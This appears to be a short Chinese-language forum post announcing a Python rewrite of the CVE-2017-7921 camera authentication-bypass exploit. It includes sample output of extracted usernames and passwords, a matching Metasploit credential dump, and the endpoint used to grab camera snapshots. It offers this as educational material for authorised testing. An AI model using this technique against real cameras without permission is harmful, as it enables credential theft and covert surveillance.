我使用 Python 简单重写了 CVE-2017-7921,仅供教育用途!
相当简单,我没有包含对 IP 之类的检查,也没有对响应进行高级检查等。 我在一台授权测试的摄像头(在我本地网络内)上进行了测试,似乎完美运行。
#示例输出:
python 2017.py
found usernames: admin,defualt
admin:Pa$$W0rd
defualt:Xf07732479
这与我们在 msfconsole 上使用相同漏洞时获取的凭据匹配。
[*] User Credentials Information:
-----------------------------
User:admin | ID:1 | Role:Administrator | Password: Pa$$W0rd
User:defualt | ID:2 | Role:Operator | Password: Xf07732479
CVE: https://nvd.nist.gov/vuln/detail/cve-2017-7921
#更新
还添加了快照功能,可以从 /Streaming/channels/1/picture 获取快照并保存到文件 ip.jpg